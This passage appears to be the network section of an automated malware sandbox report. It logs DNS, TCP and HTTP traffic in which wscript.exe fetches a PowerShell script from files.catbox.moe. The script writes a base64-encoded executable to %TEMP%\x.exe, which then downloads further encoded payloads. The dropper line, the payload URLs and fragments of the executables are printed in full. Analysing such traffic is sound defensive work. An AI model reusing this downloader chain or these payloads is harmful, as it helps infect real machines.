                                                    Dec 19, 2024 07:50:11.292156935 CET49731443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:11.292165041 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:11.292227983 CET49731443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:11.304502964 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:11.304517031 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:11.304563999 CET49731443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:11.304572105 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:11.304585934 CET49731443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:11.304620028 CET49731443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:11.413553953 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:11.413577080 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:11.413674116 CET49731443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:11.413686037 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:11.413738966 CET49731443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:11.422730923 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:11.422744989 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:11.422802925 CET49731443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:11.422811031 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:11.422832966 CET49731443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:11.422854900 CET49731443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:11.432198048 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:11.432214975 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:11.432269096 CET49731443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:11.432276011 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:11.432302952 CET49731443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:11.432457924 CET49731443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:11.440099955 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:11.440120935 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:11.440175056 CET49731443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:11.440182924 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:11.440210104 CET49731443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:11.440325022 CET49731443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:11.443875074 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:11.443942070 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:11.443977118 CET49731443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:11.444004059 CET49731443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:11.453131914 CET49731443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:11.464257002 CET49732443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:11.464304924 CET44349732108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:11.464400053 CET49732443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:11.465050936 CET49732443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:11.465070009 CET44349732108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:13.193588972 CET44349732108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:13.198144913 CET49732443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:13.198169947 CET44349732108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:13.921899080 CET44349732108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:13.921964884 CET44349732108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:13.922008038 CET44349732108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:13.922028065 CET49732443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:13.922060013 CET44349732108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:13.922075987 CET49732443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:13.922107935 CET49732443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:14.104665041 CET44349732108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:14.104717016 CET44349732108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:14.104785919 CET49732443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:14.104806900 CET44349732108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:14.104830980 CET44349732108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:14.104839087 CET49732443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:14.104861021 CET49732443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:14.104867935 CET44349732108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:14.104897022 CET49732443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:14.104914904 CET49732443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:14.104919910 CET44349732108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:14.104981899 CET44349732108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:14.105159998 CET49732443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:14.105300903 CET49732443192.168.2.4108.181.20.35
                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Dec 19, 2024 07:50:02.893208981 CET5752753192.168.2.41.1.1.1
                                                    Dec 19, 2024 07:50:03.196091890 CET53575271.1.1.1192.168.2.4
                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Dec 19, 2024 07:50:02.893208981 CET192.168.2.41.1.1.10x5e9Standard query (0)files.catbox.moeA (IP address)IN (0x0001)false
                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Dec 19, 2024 07:50:03.196091890 CET1.1.1.1192.168.2.40x5e9No error (0)files.catbox.moe108.181.20.35A (IP address)IN (0x0001)false
                                                    • files.catbox.moe
                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.449730108.181.20.354436632C:\Windows\System32\wscript.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-19 06:50:05 UTC330OUTGET /ugok5m.ps1 HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-ch
                                                    UA-CPU: AMD64
                                                    Accept-Encoding: gzip, deflate
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                    Host: files.catbox.moe
                                                    Connection: Keep-Alive
                                                    2024-12-19 06:50:05 UTC549INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Thu, 19 Dec 2024 06:50:05 GMT
                                                    Content-Type: application/octet-stream
                                                    Content-Length: 14456
                                                    Last-Modified: Wed, 18 Dec 2024 23:13:24 GMT
                                                    Connection: close
                                                    ETag: "67635714-3878"
                                                    X-Content-Type-Options: nosniff
                                                    Content-Security-Policy: default-src 'self' https://files.catbox.moe; style-src https://files.catbox.moe 'unsafe-inline'; img-src 'self' data:; font-src 'self'; media-src 'self'; object-src 'self';
                                                    Access-Control-Allow-Origin: *
                                                    Access-Control-Allow-Methods: GET, HEAD
                                                    Accept-Ranges: bytes
                                                    2024-12-19 06:50:05 UTC14456INData Raw: 24 70 3d 5b 49 4f 2e 50 61 74 68 5d 3a 3a 43 6f 6d 62 69 6e 65 28 24 65 6e 76 3a 54 45 4d 50 2c 22 78 2e 65 78 65 22 29 0d 0a 5b 49 4f 2e 46 69 6c 65 5d 3a 3a 57 72 69 74 65 41 6c 6c 42 79 74 65 73 28 24 70 2c 5b 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75
                                                    Data Ascii: $p=[IO.Path]::Combine($env:TEMP,"x.exe")[IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUu


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.2.449731108.181.20.354433448C:\Users\user\AppData\Local\Temp\x.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-19 06:50:10 UTC76OUTGET /0hc11b.txt HTTP/1.1
                                                    Host: files.catbox.moe
                                                    Connection: Keep-Alive
                                                    2024-12-19 06:50:10 UTC560INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Thu, 19 Dec 2024 06:50:10 GMT
                                                    Content-Type: text/plain
                                                    Content-Length: 382296
                                                    Last-Modified: Wed, 18 Dec 2024 23:11:36 GMT
                                                    Connection: close
                                                    Vary: Accept-Encoding
                                                    ETag: "676356a8-5d558"
                                                    X-Content-Type-Options: nosniff
                                                    Content-Security-Policy: default-src 'self' https://files.catbox.moe; style-src https://files.catbox.moe 'unsafe-inline'; img-src 'self' data:; font-src 'self'; media-src 'self'; object-src 'self';
                                                    Access-Control-Allow-Origin: *
                                                    Access-Control-Allow-Methods: GET, HEAD
                                                    Accept-Ranges: bytes
                                                    2024-12-19 06:50:10 UTC15824INData Raw: 54 56 70 46 55 75 67 41 41 41 41 41 57 49 50 6f 43 59 76 49 67 38 41 38 69 77 41 44 77 59 50 41 4b 41 4d 49 2f 2b 47 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 75 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 35 41 51 6d 67 50 57 42 6e 38 7a 31 67 5a 2f 4d 39 59 47 66 7a 47 71 61 6f 38 7a 70 67 5a 2f 4d 61 70 71 72 7a 50 47 42 6e 38 78 71 6d 71 2f 4d 38 59 47 66 7a 55 6d 6c 6a 61 44 31 67 5a 2f 4d 41 41 41 41 41 41 41 41 41 41 46 42 46 41 41 42 4d 41 51 45
                                                    Data Ascii: TVpFUugAAAAAWIPoCYvIg8A8iwADwYPAKAMI/+GQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAuAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAB5AQmgPWBn8z1gZ/M9YGfzGqao8zpgZ/MapqrzPGBn8xqmq/M8YGfzUmljaD1gZ/MAAAAAAAAAAFBFAABMAQE
                                                    2024-12-19 06:50:10 UTC16384INData Raw: 67 66 46 41 36 77 45 41 49 38 72 42 34 51 30 7a 38 59 6c 77 49 44 50 33 4d 2f 4d 7a 64 66 78 66 30 65 35 62 69 38 5a 65 69 2b 56 64 77 38 7a 4d 56 59 76 73 69 30 55 49 55 31 61 4e 73 4b 77 43 41 41 42 58 56 73 65 41 30 41 49 41 41 41 41 41 41 41 44 48 67 4e 67 43 41 41 43 2b 46 4c 62 38 78 77 61 34 46 4c 62 38 78 34 44 41 41 67 41 41 73 42 53 32 2f 4d 65 41 37 41 49 41 41 4d 41 55 74 76 7a 6f 76 66 37 2f 2f 34 50 45 42 49 72 49 44 37 62 42 4f 30 55 4d 63 67 6b 37 52 52 41 50 68 68 4d 42 41 41 43 46 39 6e 55 45 4d 38 6e 72 35 34 42 2b 44 41 42 31 57 59 74 4f 4a 4d 64 46 43 4d 43 75 34 67 4f 41 64 51 6d 75 67 48 55 4b 48 49 42 31 43 33 7a 47 52 51 67 41 69 30 55 49 78 6b 59 4d 41 59 74 51 47 49 58 4a 64 41 2b 4c 65 42 53 4c 51 42 77 37 30 48 58 38 44 36 2f
                                                    Data Ascii: gfFA6wEAI8rB4Q0z8YlwIDP3M/Mzdfxf0e5bi8Zei+Vdw8zMVYvsi0UIU1aNsKwCAABXVseA0AIAAAAAAADHgNgCAAC+FLb8xwa4FLb8x4DAAgAAsBS2/MeA7AIAAMAUtvzovf7//4PEBIrID7bBO0UMcgk7RRAPhhMBAACF9nUEM8nr54B+DAB1WYtOJMdFCMCu4gOAdQmugHUKHIB1C3zGRQgAi0UIxkYMAYtQGIXJdA+LeBSLQBw70HX8D6/
                                                    2024-12-19 06:50:10 UTC16384INData Raw: 77 36 55 4a 46 48 67 43 38 45 49 5a 54 62 58 38 73 74 65 57 42 73 48 47 42 43 4e 4c 49 37 66 72 67 4a 75 55 73 78 5a 4f 2b 4c 4d 59 6a 54 61 65 43 38 50 37 75 42 53 56 32 6d 6a 5a 65 6b 32 5a 37 4f 6f 71 4d 58 30 65 78 42 36 76 37 35 50 35 4e 67 32 62 4c 44 2b 58 6d 53 44 2f 70 35 53 6f 30 7a 70 63 4a 6f 7a 6f 45 49 36 51 71 30 43 78 2b 2f 45 43 76 6e 34 65 45 76 34 6d 66 4b 6b 58 36 43 75 6a 50 65 4f 48 4b 45 52 2f 76 50 31 70 4c 4f 58 4a 34 38 71 31 2f 49 7a 71 52 51 74 36 46 63 2f 78 59 6c 34 6c 4a 7a 52 47 47 32 74 49 33 4d 31 4d 75 35 47 71 53 69 31 31 4c 6b 7a 42 35 68 58 54 76 53 66 41 53 57 33 6d 61 4f 31 45 47 6a 68 50 64 4f 64 68 51 77 75 55 45 75 71 42 6b 37 2f 6c 4c 4e 67 38 55 6b 4a 51 34 45 77 7a 33 38 39 4c 71 5a 6d 30 54 70 61 5a 51 47 72
                                                    Data Ascii: w6UJFHgC8EIZTbX8steWBsHGBCNLI7frgJuUsxZO+LMYjTaeC8P7uBSV2mjZek2Z7OoqMX0exB6v75P5Ng2bLD+XmSD/p5So0zpcJozoEI6Qq0Cx+/ECvn4eEv4mfKkX6CujPeOHKER/vP1pLOXJ48q1/IzqRQt6Fc/xYl4lJzRGG2tI3M1Mu5GqSi11LkzB5hXTvSfASW3maO1EGjhPdOdhQwuUEuqBk7/lLNg8UkJQ4Ewz389LqZm0TpaZQGr
                                                    2024-12-19 06:50:10 UTC16384INData Raw: 4b 4e 6f 53 31 68 51 37 42 79 65 79 56 6c 57 2b 77 6b 53 66 6a 50 67 45 72 66 44 35 51 45 79 59 35 47 36 66 67 77 2f 63 6f 4a 2f 47 37 42 49 72 6e 37 79 6d 41 72 32 44 62 2f 42 69 36 36 75 30 37 71 48 6c 42 4e 72 43 41 48 35 7a 41 5a 6a 68 56 4c 4f 70 59 4f 71 76 46 64 4a 77 76 5a 44 31 4e 4d 6c 5a 36 57 6c 6c 38 45 46 67 51 31 68 6a 6b 46 74 32 41 51 53 30 56 76 67 52 41 49 32 7a 44 6f 66 2f 6a 6f 4c 45 68 30 57 66 53 58 6f 33 71 42 47 64 64 51 44 6d 37 73 34 48 51 56 2b 47 57 46 36 34 32 43 71 50 58 62 6d 6c 30 57 34 4d 69 48 4d 32 5a 62 6b 59 6e 72 6b 58 44 59 52 73 6d 54 37 63 63 7a 41 7a 71 66 43 39 6a 69 36 64 61 4f 72 4f 2f 46 41 61 73 59 78 4f 43 53 55 7a 72 6b 65 65 76 75 43 39 44 4a 4a 4d 47 65 63 5a 44 55 61 50 7a 62 6b 67 36 4e 6a 71 30 36 61
                                                    Data Ascii: KNoS1hQ7ByeyVlW+wkSfjPgErfD5QEyY5G6fgw/coJ/G7BIrn7ymAr2Db/Bi66u07qHlBNrCAH5zAZjhVLOpYOqvFdJwvZD1NMlZ6Wll8EFgQ1hjkFt2AQS0VvgRAI2zDof/joLEh0WfSXo3qBGddQDm7s4HQV+GWF642CqPXbml0W4MiHM2ZbkYnrkXDYRsmT7cczAzqfC9ji6daOrO/FAasYxOCSUzrkeevuC9DJJMGecZDUaPzbkg6Njq06a
                                                    2024-12-19 06:50:10 UTC16384INData Raw: 72 43 64 50 30 79 43 71 6b 43 54 54 74 4b 30 65 57 31 34 4a 56 68 7a 4a 41 30 53 39 61 72 45 63 4c 45 65 74 36 51 43 4b 34 6e 6e 6b 4e 76 48 77 50 63 55 30 55 47 31 56 7a 6b 34 75 59 30 75 65 2b 58 55 70 31 35 2f 67 46 78 6e 51 72 4f 58 37 4a 4f 6b 5a 56 56 61 6a 66 31 39 7a 6e 52 54 39 31 78 41 55 6f 45 57 54 48 73 4c 74 33 6a 31 7a 6d 56 57 55 75 32 78 41 58 2f 66 48 41 42 55 64 4b 72 70 37 59 64 58 6d 35 56 78 53 33 69 31 6a 35 50 79 56 43 5a 67 52 74 4d 34 42 5a 57 65 2b 67 58 79 53 4b 4d 35 73 4f 31 66 70 72 75 39 77 62 41 7a 33 64 49 67 4c 75 56 48 75 4f 61 44 76 6f 37 53 5a 75 6b 39 71 4e 54 61 7a 37 4b 59 33 37 61 51 67 78 38 2f 79 52 44 36 61 69 6c 4c 56 49 75 68 51 5a 52 6f 2f 47 31 35 39 73 32 5a 50 37 6e 6f 2f 66 47 79 67 30 66 5a 5a 67 56 43
                                                    Data Ascii: rCdP0yCqkCTTtK0eW14JVhzJA0S9arEcLEet6QCK4nnkNvHwPcU0UG1Vzk4uY0ue+XUp15/gFxnQrOX7JOkZVVajf19znRT91xAUoEWTHsLt3j1zmVWUu2xAX/fHABUdKrp7YdXm5VxS3i1j5PyVCZgRtM4BZWe+gXySKM5sO1fpru9wbAz3dIgLuVHuOaDvo7SZuk9qNTaz7KY37aQgx8/yRD6ailLVIuhQZRo/G159s2ZP7no/fGyg0fZZgVC
                                                    2024-12-19 06:50:10 UTC16384INData Raw: 74 46 77 41 45 50 75 6e 66 56 58 61 4c 7a 6d 2f 51 75 53 61 48 6b 74 76 54 39 67 62 52 46 66 51 54 63 6c 36 73 2b 30 4a 32 55 76 66 44 6f 46 35 5a 76 2b 46 6d 79 71 43 37 6c 61 7a 79 4e 33 41 6d 74 62 54 75 55 53 52 6a 5a 46 56 62 37 52 45 45 44 69 65 66 64 36 55 46 47 5a 6b 55 53 62 2f 51 69 53 5a 6c 43 42 55 6d 30 70 43 63 38 6b 34 54 35 75 4e 78 63 6b 6e 36 62 72 66 4c 50 39 41 74 2b 51 5a 70 67 52 4a 62 62 79 71 4c 66 71 6e 69 30 34 4a 52 6b 76 48 59 55 72 45 6b 42 37 63 72 6e 55 7a 78 45 2b 66 70 7a 57 73 64 65 54 45 38 68 79 45 53 30 66 65 68 6f 51 66 75 78 48 79 52 62 4c 54 59 75 33 6b 46 73 4c 2f 38 32 52 63 49 76 43 77 42 73 36 54 79 35 63 48 51 4a 32 36 74 34 43 77 6b 72 35 48 38 77 79 4a 64 6b 6d 53 56 31 51 66 59 34 75 49 4c 6d 4a 6f 35 38 6e
                                                    Data Ascii: tFwAEPunfVXaLzm/QuSaHktvT9gbRFfQTcl6s+0J2UvfDoF5Zv+FmyqC7lazyN3AmtbTuUSRjZFVb7REEDiefd6UFGZkUSb/QiSZlCBUm0pCc8k4T5uNxckn6brfLP9At+QZpgRJbbyqLfqni04JRkvHYUrEkB7crnUzxE+fpzWsdeTE8hyES0fehoQfuxHyRbLTYu3kFsL/82RcIvCwBs6Ty5cHQJ26t4Cwkr5H8wyJdkmSV1QfY4uILmJo58n
                                                    2024-12-19 06:50:11 UTC16384INData Raw: 32 4f 49 4d 75 33 39 64 6f 54 45 76 6d 6b 77 64 31 43 49 51 72 66 74 30 42 77 39 46 57 2b 62 71 55 58 4f 48 77 67 6a 62 6d 73 2b 56 4b 6f 36 70 48 70 48 74 77 4b 59 44 54 6c 59 70 42 43 51 75 34 68 6d 61 49 37 75 57 38 62 4b 79 33 6d 4b 6d 79 58 72 6e 75 77 56 38 4d 66 6a 38 77 74 49 44 6b 62 57 4d 43 41 55 4d 37 55 78 6e 61 37 59 31 41 6a 37 78 32 42 74 33 48 74 42 42 58 5a 32 6f 6e 54 4e 55 53 64 39 35 6a 74 4c 4e 62 58 4f 79 30 75 42 7a 62 48 55 2f 44 56 47 34 51 51 70 39 2b 65 31 30 7a 4f 4c 69 68 56 78 61 4b 65 35 64 54 39 46 69 31 69 6e 74 77 65 32 56 61 45 57 32 32 4c 46 68 51 79 35 4d 66 73 57 68 4b 68 6c 38 45 46 66 36 72 38 68 70 53 4a 79 6b 4a 77 78 4d 48 65 4f 32 59 4e 64 37 34 4e 54 54 32 7a 2b 7a 58 6b 72 4c 6a 69 4c 33 4d 30 63 70 41 41 57
                                                    Data Ascii: 2OIMu39doTEvmkwd1CIQrft0Bw9FW+bqUXOHwgjbms+VKo6pHpHtwKYDTlYpBCQu4hmaI7uW8bKy3mKmyXrnuwV8Mfj8wtIDkbWMCAUM7Uxna7Y1Aj7x2Bt3HtBBXZ2onTNUSd95jtLNbXOy0uBzbHU/DVG4QQp9+e10zOLihVxaKe5dT9Fi1intwe2VaEW22LFhQy5MfsWhKhl8EFf6r8hpSJykJwxMHeO2YNd74NTT2z+zXkrLjiL3M0cpAAW
                                                    2024-12-19 06:50:11 UTC16384INData Raw: 72 6a 42 75 36 61 52 35 30 44 72 6c 2b 51 66 74 62 74 69 4b 58 6d 54 53 46 37 58 37 6c 6a 4d 78 34 32 59 38 37 66 55 4a 33 36 33 43 31 6f 73 77 46 2b 68 6b 77 68 56 34 4c 74 70 2b 43 48 49 4e 4c 48 49 6b 6b 68 36 54 63 43 76 47 70 43 36 35 77 2b 4f 64 56 4e 5a 53 76 44 71 77 69 4b 2b 30 56 56 4f 59 6a 70 32 69 55 5a 77 59 6c 62 32 6a 73 54 59 67 61 6b 54 50 70 61 34 49 4c 59 46 67 43 2f 36 47 76 48 42 6f 49 32 56 4d 73 6d 79 6c 4c 30 76 69 61 5a 64 32 57 62 7a 74 48 54 78 73 58 51 52 57 2f 37 43 64 33 55 61 31 71 64 67 62 65 42 67 4d 62 51 58 74 72 55 57 38 64 66 63 32 6c 70 44 54 6c 63 67 2b 37 79 77 2b 45 58 4e 48 39 6e 78 78 5a 71 42 4c 4a 47 34 79 7a 57 35 67 33 78 77 64 50 49 6e 4a 33 73 42 43 6d 51 75 41 59 68 6e 72 72 4b 5a 52 73 34 37 50 30 72 6f
                                                    Data Ascii: rjBu6aR50Drl+QftbtiKXmTSF7X7ljMx42Y87fUJ363C1oswF+hkwhV4Ltp+CHINLHIkkh6TcCvGpC65w+OdVNZSvDqwiK+0VVOYjp2iUZwYlb2jsTYgakTPpa4ILYFgC/6GvHBoI2VMsmylL0viaZd2WbztHTxsXQRW/7Cd3Ua1qdgbeBgMbQXtrUW8dfc2lpDTlcg+7yw+EXNH9nxxZqBLJG4yzW5g3xwdPInJ3sBCmQuAYhnrrKZRs47P0ro
                                                    2024-12-19 06:50:11 UTC16384INData Raw: 64 7a 74 48 5a 39 70 78 68 47 39 59 55 4b 58 41 46 37 51 4e 55 68 65 76 42 37 32 39 43 61 36 41 74 4a 6a 69 4c 4f 75 50 33 6a 4d 4c 55 6f 6a 61 65 4d 68 33 56 73 54 6b 51 68 61 4d 6b 6b 36 64 48 41 56 69 77 32 55 4d 68 45 75 49 4d 67 61 4c 43 6c 6c 64 5a 68 2b 51 70 78 57 75 45 4d 35 30 70 4f 47 63 39 66 6c 74 4f 75 68 51 4d 78 4f 7a 36 4c 47 46 36 39 35 32 43 39 45 4a 4c 66 58 65 61 6a 64 76 6e 61 6a 32 50 4b 56 38 58 58 74 4d 74 66 50 37 52 6d 37 4e 76 4a 4b 4c 57 37 4e 61 36 50 52 56 62 4d 70 32 68 35 4e 66 45 50 4a 73 4e 70 2b 49 4a 58 45 66 58 36 42 57 78 50 38 62 38 74 45 2f 78 53 78 31 57 36 4a 66 33 69 79 57 62 54 61 53 44 74 49 44 34 4e 62 66 41 37 75 35 35 6e 78 55 52 75 68 4b 6d 4e 42 57 31 37 4d 72 4d 53 36 64 52 72 54 55 4a 2f 67 4c 6f 63 57
                                                    Data Ascii: dztHZ9pxhG9YUKXAF7QNUhevB729Ca6AtJjiLOuP3jMLUojaeMh3VsTkQhaMkk6dHAViw2UMhEuIMgaLClldZh+QpxWuEM50pOGc9fltOuhQMxOz6LGF6952C9EJLfXeajdvnaj2PKV8XXtMtfP7Rm7NvJKLW7Na6PRVbMp2h5NfEPJsNp+IJXEfX6BWxP8b8tE/xSx1W6Jf3iyWbTaSDtID4NbfA7u55nxURuhKmNBW17MrMS6dRrTUJ/gLocW
                                                    2024-12-19 06:50:11 UTC16384INData Raw: 50 42 63 65 64 4c 58 51 65 7a 4b 58 5a 56 31 65 69 31 74 6d 74 2f 65 36 34 59 30 33 45 72 50 6b 58 2b 56 42 38 6f 70 77 66 47 6c 2f 32 39 51 6b 74 68 5a 4e 51 73 47 55 4f 4e 6f 30 78 51 7a 54 52 38 6d 45 32 32 31 75 2f 65 6f 2f 36 2b 76 72 36 47 4d 57 66 53 2b 4c 2b 6b 51 56 55 44 51 37 53 64 74 76 55 71 39 31 35 4f 4e 38 58 34 49 65 61 36 42 57 4e 55 71 30 78 6d 2b 34 70 56 73 52 34 33 37 50 74 47 48 49 41 67 30 44 30 6f 44 35 6d 42 6c 62 69 64 2f 2b 59 62 41 30 63 72 78 5a 63 73 66 37 76 4b 6e 4a 48 63 33 6d 2b 63 6c 77 62 2f 35 77 47 37 7a 65 7a 65 4c 6a 68 6b 6f 66 46 42 57 4e 52 65 42 6e 32 63 34 64 41 50 4f 39 44 49 6c 48 6f 67 48 55 4b 4f 4d 62 37 6e 32 66 4f 4d 33 76 35 54 33 46 4e 42 54 74 48 59 6b 6d 36 6e 69 31 55 64 42 4e 7a 68 39 68 79 43 73
                                                    Data Ascii: PBcedLXQezKXZV1ei1tmt/e64Y03ErPkX+VB8opwfGl/29QkthZNQsGUONo0xQzTR8mE221u/eo/6+vr6GMWfS+L+kQVUDQ7SdtvUq915ON8X4Iea6BWNUq0xm+4pVsR437PtGHIAg0D0oD5mBlbid/+YbA0crxZcsf7vKnJHc3m+clwb/5wG7zezeLjhkofFBWNReBn2c4dAPO9DIlHogHUKOMb7n2fOM3v5T3FNBTtHYkm6ni1UdBNzh9hyCs


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    2192.168.2.449732108.181.20.354433448C:\Users\user\AppData\Local\Temp\x.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-19 06:50:13 UTC52OUTGET /t7rwbh.txt HTTP/1.1
                                                    Host: files.catbox.moe
                                                    2024-12-19 06:50:13 UTC558INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Thu, 19 Dec 2024 06:50:13 GMT
                                                    Content-Type: text/plain
                                                    Content-Length: 37548
                                                    Last-Modified: Wed, 18 Dec 2024 06:34:09 GMT
                                                    Connection: close
                                                    Vary: Accept-Encoding
                                                    ETag: "67626ce1-92ac"
                                                    X-Content-Type-Options: nosniff
                                                    Content-Security-Policy: default-src 'self' https://files.catbox.moe; style-src https://files.catbox.moe 'unsafe-inline'; img-src 'self' data:; font-src 'self'; media-src 'self'; object-src 'self';
                                                    Access-Control-Allow-Origin: *
                                                    Access-Control-Allow-Methods: GET, HEAD
                                                    Accept-Ranges: bytes
                                                    2024-12-19 06:50:13 UTC15826INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 45 41 44 5a 55 2b 37 67 41 41 41 41 41 41 41 41 41 41 4f 41 41 44 69 45 4c 41 51 59 41 41 47 41 41 41 41 41 4b 41 41 41 41 41 41 41 41 54 6e 34 41 41 41 41 67 41 41 41 41 67 41 41 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41
